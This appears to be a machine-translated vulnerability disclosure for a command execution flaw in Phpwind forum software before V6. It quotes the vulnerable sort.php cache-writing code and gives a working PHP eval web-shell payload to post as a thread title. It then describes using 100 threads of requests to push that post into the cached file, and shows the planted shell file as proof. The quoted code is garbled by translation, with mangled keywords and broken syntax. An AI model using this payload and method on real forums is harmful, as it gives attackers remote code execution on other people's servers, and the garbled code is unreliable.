Phpwind < V6 version command execution vulnerability

Phpwind/sort.php will regularly deal with the number of posts per day, the amount of replies, the essence of the sort

The code directly uses Savearray to write the contents of the database query to the PHP file, savearray out the parameters, all using "double quotation marks to contain, so you can use the variable to execute arbitrary command

ElseIf ($action = = ' article ') {[email protected] (d_p. ") Data/bbscache/article_sort.php "); if (! $per | | $timestamp-$cachetime > $per *3600) {$_sortdb=$_sort=array (); $query = $db->query ("Select T.tid,t.subject,t.replies,t.fid from Pw_threads T left joins Pw_forums F on T.fid=f.fid WHERE T.ifche ck= ' 1 ' and t.locked< ' 2 ' and f.password= ' and f.allowvisit= ' and f.f_type<> ' hidden ' ORDER by t.replies DESC Limi T $cachenum "), while ($topic = $db->fetch_array ($query)) {if ($topic [' replies ']) {$topic [' Subject ']=substrs ($topic [ ' Subject '],25); $_sort[]= $topic;}} $_sortdb[' reply ']=$_sort;$_sort=array (); $query = $db->query ("Select T.tid,t.subject,t.hits,t.fid from Pw_threads T left joins Pw_forums F on T.fid=f.fid WHERE t.ifcheck= ' 1 ' and t.locked< ' 2 ' and f.password= ' and f.allowvisit= ' and F .f_type<> ' hidden ' ORDER by t.hits DESC LIMIT $cachenum "), while ($topic = $db->fetch_array ($query)) {if ($topic [' Hits ']) {$topic [' Subject ']=substrs ($topic [' Subject '],25); $_sort[]= $topic;}} $_sortdb[' hit ']=$_sOrt;$_sort=array (); $query = $db->query ("Select T.tid,t.subject,t.digest,t.fid from Pw_threads t left JOIN Pw_forums F On T.fid=f.fid WHERE t.digest<> ' 0 ' and t.ifcheck= ' 1 ' and t.locked< ' 2 ' and f.password= ' and f.allowvisit= ' and F .f_type<> ' hidden ' ORDER by t.lastpost DESC LIMIT $cachenum "), while ($topic = $db->fetch_array ($query)) {$topic [ ' Subject ']=substrs ($topic [' Subject '],25); $_sort[]= $topic;} $_sortdb[' Digest ']=$_sort, $ARTICLEDB =savearray (' _articledb ', $_sortdb); Writeover (d_p. ' Data/bbscache/article_ Sort.php ', "<?php\r\n". $ARTICLEDB. '? > ');}

　　

Publish a post: the title is as follows

Code Area

${@eval($_POST[x])}XXXX

Open a multi-threaded (100 threads, just a few minutes), request access to that post, until the number of posts in the first 20

function Savearray ($name, $array) {$arraydb = "\$ $name =array (\r\n\t\t"; foreach ($array as $key + = $value) {$arraydb. = " '. $key. ' =>\narray (\r\n\t\t\t "; foreach ($value as $value 1) {$arraydb. = ' Array ('; foreach ($value 1 as $value 2) {$arraydb. = '". Addslashes ($value 2). ' ", ';} $arraydb. = "), \r\n\t\t\t";} $arraydb. = "), \r\n\t\t";} $arraydb. = "); \ r \ n"; return $arraydb;

　　

Two days, when the statistics were generated, the shell was lying on the/data/bbscache/article_sort.php.

Three White Hats actual demo: http://**.**.**.**/data/bbscache/article_sort.php

Proof of vulnerability:

/data/bbscache/article_sort.php

<?php$_articledb=array (' Reply ' =>array (Array ("1", "${@eval ($_post[x])}xxxx:", "5732", "2",), Array ("10", " Ddddddddddddddddd "," "," 2 ",), Array (" 7 "," HI Everybody (  b) "," 8 "," 2 ",), Array (" 3 "," Hello "," 5 "," 2 ",), Array (" 5 " , "??", "3", "2",), Array ("2", "Test", "3", "2",), Array ("9", "Aaaaaaaaaaaaa", "2", "2",), Array ("6", "? А," 1 "," 2 ",), Array ( "8", "??" 萾, "1", "2",), "hit" =>array (Array ("1", "${@eval ($_post[x])}xxxx:", "11382", "2",), Array ("2", "Test", "3235", "2" ,), Array ("3", "Hello", "985", "2",), Array ("5", "??", "331", "2",), Array ("7", "HI Everybody (  b)", "123", "2",),

　　

Phpwind < V6 version command execution vulnerability